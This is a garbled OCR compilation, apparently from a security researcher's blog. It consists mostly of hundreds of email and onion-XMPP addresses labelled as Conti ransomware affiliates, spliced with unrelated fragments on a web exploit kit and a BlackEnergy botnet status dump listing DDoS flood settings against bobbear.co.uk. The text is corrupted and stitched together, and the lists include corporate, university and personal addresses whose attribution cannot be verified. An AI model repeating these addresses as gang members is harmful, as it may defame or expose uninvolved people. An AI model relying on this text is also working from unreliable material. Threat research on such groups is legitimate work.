nMoniqueLArmwood2534sdf@protonmail.com 
nverstevelney1994lingcandgolf@protonmail.com 
dastom@ro.ru 
gremat@rambler.ua 
nws1980@protonmail.com 
guliver@xmpp.sh 
goldcoin@exploit.im 
nmuroru@ro.ru 
jabelon@jabber.ru 
valerius2k@jabber.ru 
beautifullife@jabber.ru 


geralemur@olddot.net 


20111 


humminghead@jabber.ru 
ebaxmg3lpi@mail.ru 
asdKimbraSBrown5684dfgrecvbf@protonmail.com 
nimertracsing1988mubapea@protonmail.com 
SusanJMcCauley1457bvn@protonmail.com 
ndistmissfighster1967neydweelrie@protonmail.com 
nTiffany)JPacheco454dfg@protonmail.com 
nungamarme1994unfiphy@protonmail.com 
nardenbirdie@protonmail.com 
nranorslipho1953brocored@protonmail.com 
arnfinnr@exploit.im 

faster 1963@xmpp.jp 

yastreb@exploit.im 

mario2bebi@jabb.im 
ndaihudketa1986@protonmail.com 
nkendpracpahal986@protonmail.com 
daihudketal986@protonmail.com 
Imcgee@bricknerfamily.com 
eraven@keemail.me 
gareuma@protonmail.com 

muroru@ro.ru 

mikroon@lenta.ru 

nomom@tutanota.com 
askorvine@protonmail.com 

obiscope@ro.ru 

unodetune@tutanota.com 
ndonnaj113300@gmail.com 
zholbolat.temirlan@gmail.com 
segej.ivanov001@mail.ru 
naned@q3mcco35auwcstmt.onion 
torres-claudia@email.com 
susannestephens84@myself.com 
macocina@rambler.ru 
takrainskaya@rambler.ua 

ubeou@ro.ru 

20112 
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Oops, they keep doing it, again and again - trying to cash-in on the biased exclusiveness 
of web malware exploitation kits in general, which when combined with active branding is 
supposed to make them rich. However, despite the low price of $300 in this particular case, 
this copycat kit is once again lacking any signification differentiation factors besides perhaps 
the 20+ exploits targeting Opera and Internet Explorer included within. 


2014 


stagov@lenta.ru 
huanlyu@keemail.me 
askalina@rambler.ua 
wanwone@rambler.ua 
oremiazero@keemail.me 
norwayinbay@mail.com 
bjaqer@bk.ru 
coopertinojam@gmx.com 
begemot sun@jabber.ru 
nchriswoakes888@protonmail.com 
nprobacimmus1987@protonmail.com 
marxkarl777@protonmail.com 
dictyna@tssssss. info 
ramilramil@protonmail.com 
nafasd@asda.com 

acava@ro.ru 

baerd90@bk.ru 

Rsebas@mail.com 
kroundarey@keemail.me 
watota@tutanota.com 

Zazzn@ro.ru 

nkvdvs@bk.ru 

wonto@tuta.io 

antasasia@ro.ru 
alkalane@autorambler.ru 
awalays@protonmail.com 
nmarkallen888@protonmail.com 
nsandlolyholl1976@protonmail.com 
nmaxallen938@protonmail.com 
ntibelltalcol1989@protonmail.com 
nerideline@keemail.me 
ggfhfhhvcfdhgjyg7t88958685@gmail.com 
utuit@ro.ru 

buer@thesecure. biz 


highping@ro.ru 


20113 


saintanny@gmail.com 
3000t@protonmail.com 
vouvom@ro.ru 
tadamom@protonmail.com 
88teo@tutanota.com 
duke@q3mcco35auwcstmt.onion 
benstokesOOO0@protonmail.com 
te4al@ro.ru 

cueno@ro.ru 
Ssamuam@tutanota.com 
onarotade@tutanota.de 
ballao@list.ru 
wandone@protonmail.com 
badroom@keemail.me 
dandau@ro.ru 
nmaxhead777@protonmail.com 
nululnefarcl1985@protonmail.com 
milanmarley@protonmail.com 
tnt@q3mcco35auwcstmt.onion 
nalexcrypt@neko.im 
nmilanduke666@protonmail.com 
ntasihighphal979@protonmail.com 
nmilanmarley@protonmail.com 
nmorttigolal1979@protonmail.com 
ngraddds@xmpp.jp 
33barom@tutanota.com 
argontom@tutanota.com 
wma@rambler.ua 
vselenamut@protonmail.com 
clauz@xmpp.jp 
auchie@protonmail.ch 
ericmeric@protonmail.com 
osteru@ro.ru 

osunc@ro.ru 
separatorl12@protonmail.com 
20114 


kiioto@ro.ru 

wertuone@rambler.ua 
unimore@keemail.me 
tramolta@lenta.ru 

waroru@ro.ru 

trutu@tuta.io 
gregony@protonmail.com 
egenta@lenta.ru 

Maniaro@ro.ru 
hookam@autorambler.ru 
onemail@keemail.me 
keiblemuel84132@gmail.com 
nwonto@tuta.io 
ululnefarc1985@protonmail.com 
ragessaflen@yahoo.com 
melis-13@yandex.ru 
nconsracvide1973@protonmail.com 
nsubsroreascal988@protonmail.com 
nfantdotmufflung1974@protonmail.com 
nalinposol974@protonmail.com 
upuna@rambler.ua 
nasutina@mail.ua 
wsawsa@rambler.ua 
zantorino@keemail.me 
resloman@tutanota.com 
mesccuo@rambler.ru 
karlmarx000@protonmail.com 
nmeatfcomptroznal1977@protonmail.com 
nposeytobin777@protonmail.com 
nzlatruonuchand1972@protonmail.com 
nglennmartin876@protonmail.com 
nulocuref1983@protonmail.com 
nwoakescolin@protonmail.com 
nenpresbardio1971@protonmail.com 


nkitshaw5@protonmail.com 


20115 


nbartofestge1973@protonmail.com 
nchriswoakes851@protonmail.com 
nfollvipostre1974@protonmail.com 
ndanebirch9@protonmail.com 
nisretelal9@protonmail.com 
nhalegarrison77@protonmail.com 
nbeaucombcomli1987@protonmail.com 
ndanelavender268@protonmail.com 
ndowncanjacksec1984@protonmail.com 
njmax3946@protonmail.com 
nfansadirfden1971@protonmail.com 
jmax3946@protonmail.com 
larosfages@gmail.com 
dari7070@ro.ru 
cuprum@keemail.me 
berstiminec1979@protonmail.com 
nslanalinob1977@protonmail.com 
thalegarrison77@protonmail.com 
imikitka@protonmail.com 
dsaind@tuta.io 

turnsa@rambler.ua 

diamore@ro.ru 
etsumiutsumi@gmail.com 
etsiujttsumi@hotmail.com 
trev@f.com 

qrasawa@tutanota.com 
ta.dubling@protonmail.com 
tqx.rock@protonmail.com 
ts.gulfeg@protonmail.com 
tbenj1987@protonmail.com 
gurtan@keemail.me 
log.foreman@biendongpoc.vn 
ndksfhsifgisldfcvxz@mail.ru 
ncjhfvdjhgfshbf@mail.ru 
nbbdfhguygfes@mail.ru 

20116 


ndacjvhjicdgfvi@mail.ru 
nmichajfbahsdfga@mail.ru 
nconsfronepun1983@protonmail.com 
nhawhunrocul1982@protonmail.com 
99totu@rambler.ua 
kgarot@gmail.com 
nbonen109@mail.ru 

nguru@mail.ru 
hose007@protonmail.com 
milwerta@tuta.io 
patrik80@tutanota.com 
myagra@rambler.ua 
saulgdmn@jabb.im 

UPDATE: 


The following is the full list of all the Conti ransomware gang affiliates and Dark Web onion 
XMPP server users. 


admin@q3mcco35auwcstmt.onion 
admintest@q3mcco35auwcstmt.onion 
admu@q3mcco35auwcstmt.onion 
ahtyng@q3mcco35auwcstmt.onion 
air@q3mcco35auwcstmt.onion 
alarm2@q3mcco35auwcstmt.onion 
alarm@q3mcco35auwcstmt.onion 
alaska@q3mcco35auwcstmt.onion 
ali@q3mcco35auwcstmt.onion 
alto@q3mcco35auwcstmt.onion 
andy@q3mcco35auwcstmt.onion 
answer@q3mcco35auwcstmt.onion 
atlant@q3mcco35auwcstmt.onion 
atlas@q3mcco35auwcstmt.onion 
axel@q3mcco35auwcstmt.onion 
azot@q3mcco35auwcstmt.onion 
badboy@q3mcco35auwcstmt.onion 
baget@q3mcco35auwcstmt.onion 
baly@q3mcco35auwcstmt.onion 
band@q3mcco35auwcstmt.onion 
20117 


baraka@q3mcco35auwcstmt.onion 
baron@q3mcco35auwcstmt.onion 
bash@q3mcco35auwcstmt.onion 
batka@q3mcco35auwcstmt.onion 
baxter@q3mcco35auwcstmt.onion 
begemot@q3mcco35auwcstmt.onion 
bekeeper@q3mcco35auwcstmt.onion 
bentley@q3mcco35auwcstmt.onion 
beny@q3mcco35auwcstmt.onion 
best@q3mcco35auwcstmt.onion 
beta@q3mcco35auwcstmt.onion 
bezdar@q3mcco35auwcstmt.onion 
bill@q3mcco35auwcstmt.onion 
billgeizh@q3mcco35auwcstmt.onion 
bio@q3mcco35auwcstmt.onion 
blackjob@q3mcco35auwcstmt.onion 
blood@q3mcco35auwcstmt.onion 
bloodrush@q3mcco35auwcstmt.onion 
bob@q3mcco35auwcstmt.onion 
boby@q3mcco35auwcstmt.onion 
bonen@q3mcco35auwcstmt.onion 
born@6ub5waskpuglkrjoz5se23xushqvr3pgpseyetxiycjmp6h5gm6jrpad.onion 
born@q3mcco35auwcstmt.onion 
bourbon@q3mcco35auwcstmt.onion 
bra@q3mcco35auwcstmt.onion 
braun@q3mcco35auwcstmt.onion 
brom@q3mcco35auwcstmt.onion 
buggati@q3mcco35auwcstmt.onion 
bullet@q3mcco35auwcstmt.onion 
bumer@q3mcco35auwcstmt.onion 
buran@q3mcco35auwcstmt.onion 
buza@q3mcco35auwcstmt.onion 
calmar@q3mcco35auwcstmt.onion 
cany@q3mcco35auwcstmt.onion 


carter@q3mcco35auwcstmt.onion 
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casper@q3mcco35auwcstmt.onion 
caution@q3mcco35auwcstmt.onion 
ceram@q3mcco35auwcstmt.onion 
cert@q3mcco35auwcstmt.onion 
chain@q3mcco35auwcstmt.onion 
chaos@q3mcco35auwcstmt.onion 
cheesecake@q3mcco35auwcstmt.onion 
cherry@q3mcco35auwcstmt.onion 
chip@q3mcco35auwcstmt.onion 
cicada@q3mcco35auwcstmt.onion 
clipper@q3mcco35auwcstmt.onion 
cnn@q3mcco35auwcstmt.onion 
contisupport@q3mcco35auwcstmt.onion 
cooler@q3mcco35auwcstmt.onion 
cosmos@q3mcco35auwcstmt.onion 
creamsod@q3mcco35auwcstmt.onion 
cruz@q3mcco35auwcstmt.onion 
cybergangster@q3mcco35auwcstmt.onion 
dandis@q3mcco35auwcstmt.onion 
dandmen@q3mcco35auwcstmt.onion 
dantis@q3mcco35auwcstmt.onion 
darc@q3mcco35auwcstmt.onion 
def@q3mcco35auwcstmt.onion 
defender@q3mcco35auwcstmt.onion 
demetrius@q3mcco35auwcstmt.onion 
demon@q3mcco35auwcstmt.onion 
deploy@q3mcco35auwcstmt.onion 
derek@q3mcco35auwcstmt.onion 
derekson@q3mcco35auwcstmt.onion 
dick@q3mcco35auwcstmt.onion 
dino@q3mcco35auwcstmt.onion 
doctor@q3mcco35auwcstmt.onion 
dollar@q3mcco35auwcstmt.onion 
dominik@q3mcco35auwcstmt.onion 


doomsday@q3mcco35auwcstmt.onion 
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dove@q3mcco35auwcstmt.onion 
driver@q3mcco35auwcstmt.onion 
duna@q3mcco35auwcstmt.onion 
dylan@q3mcco35auwcstmt.onion 
dylon@q3mcco35auwcstmt.onion 
ed@q3mcco35auwcstmt.onion 
electronic@q3mcco35auwcstmt.onion 
elon@q3mcco35auwcstmt.onion 
elvira@q3mcco35auwcstmt.onion 
fast@q3mcco35auwcstmt.onion 
fatboy@q3mcco35auwcstmt.onion 
fire@q3mcco35auwcstmt.onion 
flint@q3mcco35auwcstmt.onion 
flip@q3mcco35auwcstmt.onion 
fly@q3mcco35auwcstmt.onion 
fog@q3mcco35auwcstmt.onion 
food@q3mcco35auwcstmt.onion 
forbes@q3mcco35auwcstmt.onion 
ford@q3mcco35auwcstmt.onion 
forest@q3mcco35auwcstmt.onion 
forum@q3mcco35auwcstmt.onion 
fox@q3mcco35auwcstmt.onion 
frank@q3mcco35auwcstmt.onion 
freebeer@q3mcco35auwcstmt.onion 
frog@q3mcco35auwcstmt.onion 
front@q3mcco35auwcstmt.onion 
frost@q3mcco35auwcstmt.onion 
fury@q3mcco35auwcstmt.onion 
ganesh@q3mcco35auwcstmt.onion 
germes@q3mcco35auwcstmt.onion 
ghost@q3mcco35auwcstmt.onion 
git@q3mcco35auwcstmt.onion 
glad@q3mcco35auwcstmt.onion 
globus@q3mcco35auwcstmt.onion 


gm@q3mcco35auwcstmt.onion 
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goga@q3mcco35auwcstmt.onion 
gold@q3mcco35auwcstmt.onion 
golova@q3mcco35auwcstmt.onion 
goodwin@q3mcco35auwcstmt.onion 
gorec@q3mcco35auwcstmt.onion 
graf@q3mcco35auwcstmt.onion 
grafin@q3mcco35auwcstmt.onion 
grajdanin@q3mcco35auwcstmt.onion 
gram@q3mcco35auwcstmt.onion 
grand@q3mcco35auwcstmt.onion 
grant@q3mcco35auwcstmt.onion 
green@q3mcco35auwcstmt.onion 
gringo@q3mcco35auwcstmt.onion 
grom@q3mcco35auwcstmt.onion 
grover@q3mcco35auwcstmt.onion 
guava@q3mcco35auwcstmt.onion 
gucci@q3mcco35auwcstmt.onion 
gus@q3mcco35auwcstmt.onion 
hash@q3mcco35auwcstmt.onion 
hitech@q3mcco35auwcstmt.onion 
hlor@q3mcco35auwcstmt.onion 
hod@q3mcco35auwcstmt.onion 
hof@q3mcco35auwcstmt.onion 
hookahplace@conference.q3mcco35auwcstmt.onion 
hors@q3mcco35auwcstmt.onion 
horse@q3mcco35auwcstmt.onion 
idgo@q3mcco35auwcstmt.onion 
impact@q3mcco35auwcstmt.onion 
inkognito@q3mcco35auwcstmt.onion 
jax@q3mcco35auwcstmt.onion 
johnyboy77@q3mcco35auwcstmt.onion 
jumbo@q3mcco35auwcstmt.onion 
kagas@q3mcco35auwcstmt.onion 
kaktus@q3mcco35auwcstmt.onion 


kent@q3mcco35auwcstmt.onion 
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kerasid@q3mcco35auwcstmt.onion 
kevin@q3mcco35auwcstmt.onion 
killer@q3mcco35auwcstmt.onion 
kingston@q3mcco35auwcstmt.onion 
kintaro@q3mcco35auwcstmt.onion 
klaus@q3mcco35auwcstmt.onion 
kolbasa@q3mcco35auwcstmt.onion 
kolin@q3mcco35auwcstmt.onion 
kramer@q3mcco35auwcstmt.onion 
kran@q3mcco35auwcstmt.onion 
larry@q3mcco35auwcstmt.onion 
lemur@q3mcco35auwcstmt.onion 
leo@q3mcco35auwcstmt.onion 
licor@q3mcco35auwcstmt.onion 
loft@q3mcco35auwcstmt.onion 
log@q3mcco35auwcstmt.onion 
logan@q3mcco35auwcstmt.onion 
lom@q3mcco35auwcstmt.onion 
longer@q3mcco35auwcstmt.onion 
love@q3mcco35auwcstmt.onion 
lucas@q3mcco35auwcstmt.onion 
macallan@q3mcco35auwcstmt.onion 
mango@odw5mdwotufuxxrgw3pvaqjjuze3e33bylylkl667h4nefwiimwqsumyd.onion 
mango@q3mcco35auwcstmt.onion 
many@q3mcco35auwcstmt.onion 
marcus@q3mcco35auwcstmt.onion 
marsel@q3mcco35auwcstmt.onion 
mashroom@q3mcco35auwcstmt.onion 
master@q3mcco35auwcstmt.onion 
matiz@q3mcco35auwcstmt.onion 
mavelak@q3mcco35auwcstmt.onion 
mavelek@q3mcco35auwcstmt.onion 
mavemat@q3mcco35auwcstmt.onion 
max17@q3mcco35auwcstmt.onion 


max@q3mcco35auwcstmt.onion 
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[ All Hits - 1552 ] [ Al'toads- 385 ] 


Marketed for novice users, despite lacking any key features worth being worried about, it’s 
still managing to maintain a steady infection rate of unpatched Opera browsers. Such 
statistics obtained in an OSINT fashion always provide a realistic perspective on publicly 
known facts, like the one where millions of end users continue getting exploited due to their 
overall misunderstanding of today’s threatscape driven by the ubiquitous web exploitation 
kits. 
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meatball@q3mcco35auwcstmt.onion 
mentos@q3mcco35auwcstmt.onion 
merch@q3mcco35auwcstmt.onion 
miguel@q3mcco35auwcstmt.onion 


miner@q3mcco35auwcstmt.onion 


mitzi@6ub5waskpuglkrjbz5se23xushqvr3pgpseyetxiycjmp6h5gm6jrpad.onion 


modar@q3mcco35auwcstmt.onion 
modnik@q3mcco35auwcstmt.onion 
moms@q3mcco35auwcstmt.onion 
mont@q3mcco35auwcstmt.onion 
moon@q3mcco35auwcstmt.onion 
mops@q3mcco35auwcstmt.onion 
morgan@q3mcco35auwcstmt.onion 
morisson@q3mcco35auwcstmt.onion 
mors@q3mcco35auwcstmt.onion 
mozart@q3mcco35auwcstmt.onion 
muchacho@q3mcco35auwcstmt.onion 
mult@q3mcco35auwcstmt.onion 
mushroom@q3mcco35auwcstmt.onion 
n@q3mcco35auwcstmt.onion 
naned@q3mcco35auwcstmt.onion 
nanswer@q3mcco35auwcstmt.onion 
nbaraka@q3mcco35auwcstmt.onion 
ncheesecake@q3mcco35auwcstmt.onion 
nek@q3mcco35auwcstmt.onion 
nelon@q3mcco35auwcstmt.onion 
neo@q3mcco35auwcstmt.onion 
netman@q3mcco35auwcstmt.onion 
netwalker@q3mcco35auwcstmt.onion 
nevada@q3mcco35auwcstmt.onion 
nick@q3mcco35auwcstmt.onion 
nik-da@q3mcco35auwcstmt.onion 
njax@q3mcco35auwcstmt.onion 
njumbo@q3mcco35auwcstmt.onion 


nkintaro@q3mcco35auwcstmt.onion 
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nmeatball@q3mcco35auwcstmt.onion 
nprizrak@q3mcco35auwcstmt.onion 
nrevers@q3mcco35auwcstmt.onion 
nsubzero@q3mcco35auwcstmt.onion 
ntramp@q3mcco35auwcstmt.onion 
nuggets@q3mcco35auwcstmt.onion 
oldtimes@q3mcco35auwcstmt.onion 
oliver@q3mcco35auwcstmt.onion 
olsen@q3mcco35auwcstmt.onion 
packman@hsfhksrd62ga3n3v.onion 
page@q3mcco35auwcstmt.onion 
painkiller@q3mcco35auwcstmt.onion 
paranoik@q3mcco35auwcstmt.onion 
pin2@q3mcco35auwcstmt.onion 
pin@q3mcco35auwcstmt.onion 
pincus@q3mcco35auwcstmt.onion 
pineapple@q3mcco35auwcstmt.onion 
poll@conference.q3mcco35auwcstmt.onion 
poll@q3mcco35auwcstmt.onion 
ponetre@q3mcco35auwcstmt.onion 
porovoz@q3mcco35auwcstmt.onion 
price@q3mcco35auwcstmt.onion 
prizrak@q3mcco35auwcstmt.onion 
professor@q3mcco35auwcstmt.onion 
pumba@q3mcco35auwcstmt.onion 
qwerqwerqwerqwer@q3mcco35auwcstmt.onion 
qwerty@q3mcco35auwcstmt.onion 
ramon@q3mcco35auwcstmt.onion 
rand@q3mcco35auwcstmt.onion 
redmond@q3mcco35auwcstmt.onion 
reshaev@q3mcco35auwcstmt.onion 
revan@q3mcco35auwcstmt.onion 
revers@q3mcco35auwcstmt.onion 
romanov@q3mcco35auwcstmt.onion 


romanov _2@q3mcco35auwcstmt.onion 
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rooty@q3mcco35auwcstmt.onion 


rozetka@q3mcco35auwcstmt.onion 


salamandra@q3mcco35auwcstmt.onion 


sand@q3mcco35auwcstmt.onion 
santi@q3mcco35auwcstmt.onion 
sentinel@q3mcco35auwcstmt.onion 
sepvilk@q3mcco35auwcstmt.onion 


serp@q3mcco35auwcstmt.onion 


seven300@q3mcco35auwcstmt.onion 


shamm@q3mcco35auwcstmt.onion 
shark@q3mcco35auwcstmt.onion 
sharn@q3mcco35auwcstmt.onion 
shell@q3mcco35auwcstmt.onion 


skippy@q3mcco35auwcstmt.onion 


skywalker@q3mcco35auwcstmt.onion 


slojno@q3mcco35auwcstmt.onion 
snow@q3mcco35auwcstmt.onion 
sonar@q3mcco35auwcstmt.onion 
soul@q3mcco35auwcstmt.onion 
specter@q3mcco35auwcstmt.onion 
spider@q3mcco35auwcstmt.onion 
spoon@q3mcco35auwcstmt.onion 
staff@q3mcco35auwcstmt.onion 
stakan@q3mcco35auwcstmt.onion 
star@q3mcco35auwcstmt.onion 
starfall@q3mcco35auwcstmt.onion 
steller@q3mcco35auwcstmt.onion 
stern@q3mcco35auwcstmt.onion 
steve@q3mcco35auwcstmt.onion 
sticks@q3mcco35auwcstmt.onion 
stigg@q3mcco35auwcstmt.onion 
strix@q3mcco35auwcstmt.onion 
subzero@q3mcco35auwcstmt.onion 
summit@q3mcco35auwcstmt.onion 


sunday@q3mcco35auwcstmt.onion 
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swift@q3mcco35auwcstmt.onion 
taker@q3mcco35auwcstmt.onion 
taobao@q3mcco35auwcstmt.onion 
target@q3mcco35auwcstmt.onion 
tatarin@q3mcco35auwcstmt.onion 
taur@q3mcco35auwcstmt.onion 
terry@q3mcco35auwcstmt.onion 
test@q3mcco35auwcstmt.onion 
tibone@q3mcco35auwcstmt.onion 
tiktak@q3mcco35auwcstmt.onion 
tilar@q3mcco35auwcstmt.onion 
tiniles@q3mcco35auwcstmt.onion 
tom@q3mcco35auwcstmt.onion 
toris@q3mcco35auwcstmt.onion 
tort@q3mcco35auwcstmt.onion 
tramp@q3mcco35auwcstmt.onion 
troy@q3mcco35auwcstmt.onion 
trumen@q3mcco35auwcstmt.onion 
ttrr@conference.q3mcco35auwcstmt.onion 
tunri@q3mcco35auwcstmt.onion 
twin@q3mcco35auwcstmt.onion 
urbanone@q3mcco35auwcstmt.onion 
valemy@q3mcco35auwcstmt.onion 
vampire@q3mcco35auwcstmt.onion 
van@q3mcco35auwcstmt.onion 
veron@q3mcco35auwcstmt.onion 
vertu@q3mcco35auwcstmt.onion 
viper@q3mcco35auwcstmt.onion 
void@q3mcco35auwcstmt.onion 
werka@conference.q3mcco35auwcstmt.onion 
wertu@q3mcco35auwcstmt.onion 
wind@q3mcco35auwcstmt.onion 
winston@q3mcco35auwcstmt.onion 
wowddoz@q3mcco35auwcstmt.onion 
xenkee@q3mcco35auwcstmt.onion 
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xenon@q3mcco35auwcstmt.onion 
xoc@q3mcco35auwcstmt.onion 
zevs@3mcco35auwcstmt.onion 
zevs@q3mcco35auwcstmt.onion 
zloysobaka@q3mcco35auwcstmt.onion 
zolotoy@q3mcco35auwcstmt.onion 
zul.as@q3mcco35auwcstmt.onion 
zulas@q3mcco35auwcstmt.onion 
UPDATE: 


The following is the full list of all the members of the Conti ransomware gang obtained using 
public sources. 


loguntsov@gmail.com 
smtbrowser@thesecure.biz 
21lyelow21@jabb.im 
jamonsmaslom@xmpp.jp 
vladimir.tyrenko@mail.ru 
benalen@exploit.im 
tdemeza@gmail.com 
Berkley Randal@netc.it 
eldorado@count0O.ws 
firefox333@xmpp.jp 
avamar@gnu.gr 
andrej.sergeev _2020@mail.ru 
volhvb@exploit.in 
armata@exploit.im 
ddivelbiss@divelbiss.com 
vruel@blah.im 
jydmeszp@sharklasers.com 
support@korovka.name 
support@mpro.la 
nrobootbander@jabb.im 
n4815162342@jabb.im 
nsheppard@jabber.ru 
nsectorzero@jabb.im 
arturh76@jabber.ru 
neversay@mail.ru 
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nitserviceemilabkarov@gmail.com 
k.startsev@xmpp.jp 
biomechanic3000@xmpp.jp 
nnikola131189@gmail.com 
nalec.kirsanov@mail.ru 
warrenmega@protonmail.com 
ahurtado@grundfos.com 
joe@flowdataindustries.com 
njointofffdsd@protonmail.com 
basils1991@gmail.com 
snowwinter@exploit.im 
tiffany.huff@levelconsult.us 
packman@hsfhksrd62ga3n3v.onion 
nrandman@thesecure.biz 
nnrandman@thesecure. biz 
vasilymm@memail.com 
zevs@3mcco35auwcstmt.onion 
interview _admin@jabb.im 

sm0k3 _1337@xmpp.jp 
uniftorambo@exploit.im 

rdpcorp _@thesecure.biz 
support@cletricks.com 
jee-nospam@jabbim.pl 
akonitborec@thesecure.biz 
operathionshieldfr@protonmail.com 
DOC _ID@exploit.im 
al.pro.80@jabb.im 
i72jc910jecuwj72771@creep.im 
emigrant@xmpp.jp 

blackmatter _interviews@exploit.im 
namso@thesecure. biz 
karal@xmpp.jp 
admin@expiro-team.biz 
tmart1lnx@jabbim.cz 


maestros11@jabber.ru 
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emilyspizza@pimux.de 
support@j.vip72.org 
support1@j.vip72.org 
Kopytinv1997@bk.ru 
xvioletta2013@gmail.com 
alexmillerlL26@outlook.com 
alexm112266@outlook.com 
202002739584@alunos.estacio.br 
aravancargol@proloads.com 
michal.olbrychtowicz@student.uj.edu.pl 
jameswatson@xmpp.jp 
conti.cont@yandex.ru 
gpbit@thesecure. biz 
cps123@exploit.im 
grave@jabber.hot-chilli.eu 
joynses@thesecure.biz 
verchunls@chatterboxtown.us 
iqbal@javabomb.com 
nolaf@scholja.de 
nnacho.travesib@gmail.com 
dpigeon@exploit.im 
udotop12@thesecure.biz 
navos@thesecure. biz 
navos@strong.pm 
njoynses@thesecure. biz 
olaf@scholja.de 
benalien@xmpp.jp 
njefferson@14740-27223.bacloud.info 
ChrisHanley@solution4u.com 
eleoslin@msjb.pw 
eleos@msjb.pw 
jean69@thesecure. biz 
miroslavpopov1980@outlook.com 
fillemand@protonmail.com 
t90@bashtel.ru 
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boydjen-it@outlook.com 
acne _121@protonmail.com 
grolly26@protonmail.com 
whereismymOney@xmpp.jp 
ggmgomes89@outlook.com 
aaramburu@celgene.com 
morozova.olga84@outlook.com 
billgeiznh@thesecure.biz 
anemois@protonmail.com 
lighting-recover-99@protonmail.com 
salmon21@thesecure.biz 
ultradelovoy@exploit.im 
globus-homer@jabber.ru 
batono@xmpp.jp 
celiden@ro.ru 
trentor@tuta.io 
flourish@nibblefish.net 
vlatislava@ro.ru 
ebekka@ro.ru 
ewok555@protonmail.com 
sunasos@ro.ru 
samoma@ro.ru 
scrag@nibblefish.net 
totalto@ro.ru 
mokko@inbox.|v 
bukazoid76@inbox.Iv 
kuegel@tutanota.de 
qviperOO@xmpp.is 
spoofie@xmpp.jp 
valeriuS2k@jabber.ru 
coolman@1jabber.com 
fire@verified.pm 

UPDATE: 


The following are all of the currently active XMPP Dark Web onion server users of the Conti 
ransomware gang: 


admintest@q3mcco35auwcstmt.onion 
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admu@q3mcco35auwcstmt.onion 
alarm2@q3mcco35auwcstmt.onion 
alarm@q3mcco35auwcstmt.onion 
alaska@q3mcco35auwcstmt.onion 
ali@q3mcco35auwcstmt.onion 
alto@q3mcco35auwcstmt.onion 
andy@q3mcco35auwcstmt.onion 
answer@q3mcco35auwcstmt.onion 
axel@q3mcco35auwcstmt.onion 
azot@q3mcco35auwcstmt.onion 
baget@q3mcco35auwcstmt.onion 
baly@q3mcco35auwcstmt.onion 
band@q3mcco35auwcstmt.onion 
batka@q3mcco35auwcstmt.onion 
bekeeper@q3mcco35auwcstmt.onion 
bentley@q3mcco35auwcstmt.onion 
beny@q3mcco35auwcstmt.onion 
beta@q3mcco35auwcstmt.onion 
bill@q3mcco35auwcstmt.onion 
blackjob@q3mcco35auwcstmt.onion 
bob@q3mcco35auwcstmt.onion 
boby@q3mcco35auwcstmt.onion 
bonen@q3mcco35auwcstmt.onion 
bourbon@q3mcco35auwcstmt.onion 
bra@q3mcco35auwcstmt.onion 
braun@q3mcco35auwcstmt.onion 
brom@q3mcco35auwcstmt.onion 
bullet@q3mcco35auwcstmt.onion 
bumer@q3mcco35auwcstmt.onion 
buza@q3mcco35auwcstmt.onion 
calmar@q3mcco35auwcstmt.onion 
cany@q3mcco35auwcstmt.onion 
carter@q3mcco35auwcstmt.onion 
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The following are sample photos obtained from internal leaked communication of the Conti 
ransomware gang members using public sources. 
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UPDATE: 


The following are sample photos obtained from internal leaked Conti ransomware gang group 
members using public sources. 
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Black Energy botnet status at 01:27:33 18.11.2008: 


somp_freq * 10 jemp_freq © 10 somp_freq * 10 xemp_freq © 10 
emp _size = 2000 pomp _ sine = 2000 emp _size = 2000 pemp sire = 2000 
syn_freq = 10 isyn_freq © 10 syn_freq * 10 syn_freq © 10 
spoof_ip= | spoot_ip= 0 spoof_ip= 0 spoot_ip= 0 
attack_mode « 0 attack_mode © 0 attack_mode « 0 |attack_mode « 0 
fAaX_sescaoes 30 pmax _sestions = 30 mnax sessions = 30 pmax sessions = 30 
jtitp_freq = 100 hittp_freq = § hitp_freq » $0 http_freq = $0 
hemp trends = 3 Pnp_theeads = 4 temp threads = 4 dnp theeads = 4 
tcpadp_freq * 20 Bcpodp_freq * 20 tcpudp_freq © 20 |Ropodp_freq « 20 
judp_size = 1000 ludp_sire = 1000 tudp_size = 1000 ludp_sire = 1000 
Acp_size * 2000 pep_sin 2000 tcp_size * 2000 Rep_sine © 2000 
cmd = flood bmp leand = flood hitp bobbear cmd = flood htp bobbear co uk lemd = flood hitp bobbear co uk 
nireqe § qe $ nireq* 5 mireq = $ 
[botid = (not set) od = (noe set Jbotid = (not set) Jboed = (not set) 

| . 
pomp freq = 10 xemp freq = 10 acemp_ freq = 10 pemp freq = 10 scmp_freq = 10 
icmp _size * 2000 iemp_sine * 20 Scmp_size * 2000 Semp_sire * 2000 icmp_size * 2000 
sya_freq = 10 syn_feq = 10 syn_freq = 10 syn_feq = 30 syn_freq = 10 
spoot_ip* 0 spoot_ip* SomeCustomlnjectedHeaderinjected_by_wvs) spoof_ip 0 |spoot_ip* 1 spoot_ip* 0 
attack mode = 0) attack mode = 0 attack mode = 0 attack mode = 0 attack mode = 0) 
Jmax_sessicas 30 max_sessions © 30 max_tessions © 30 max_sestions © 30 max_tessions © 30 
ftmp_tteq = 0 bnp freq = 100 Rep eq = 10 hitp freq = 20 erp freq = 100 
jhittp_threads © 4 ittp_threads « 3 itp _threads = 2000 http_threads « $ hitp_threads « 3 
tcpudp freq = 20 nepodp freq = 20 tcpedp freq = 20 Repodp_teq = 60 acpudp freq = 20 
lodp_size * 1000 hadp_sine * 1000 udp_size * 1000 hadp_sire * 1000 udp _size * 1000 
tep_size = 2000 Rep_site = 2000 Acp_size = 2000 Rep_sire = 2000 acp_size = 2000 
cmd * flood hitp bobbear co.uk ond © wait cmd © stop amd © stop cmd © stop 
hireg = 5 hutreq = $ nutkeg hiteq = 15 miieq = 10 
[botid © (not set) bod © xMYHOST1_347EBCFB botid © (not set bot © (not set) botid © (not set) 
jkinp_freq « 40 
pomp suze = 2000 
syn_freq = 2000 
spoot_ip= 0 
attack_mode « 0 
prnat_sessions 30 
jhetp, freq * 20 
fhemp threads = 1500 
hcpudp_freq * 4000 
judp_ size = 4100 
tcp_sze * 4000 
cmd = flood hump 
hireq * | 
fbotid = xMYHOST! 347EBCFB 


When you get the "privilege" of [1]getting DDoS-ed by a high profile DDoS for hire service 
used primarily by cybercriminals attacking other cybercriminals, you’re officially doing hell of 
a good job exposing [2]money laundering scams. 


The attached screenshot demonstrates how even the relatively more sophisticated counter 
surveillance approaches taken by a high profile DDoS for hire service can be, and were in 
fact bypassed, ending up in a real-time peek at how they’ve dedicated 4 out of their 10 
BlackEnergy botnets to Bobbear exclusively. 


Perhaps for the first time ever, | come across a related DoS service offered by the very 
same vendor - insider sabotage on demand given they have their own people in a particular 
company/ISP in question. Makes you think twice before considering a minor network glitch 
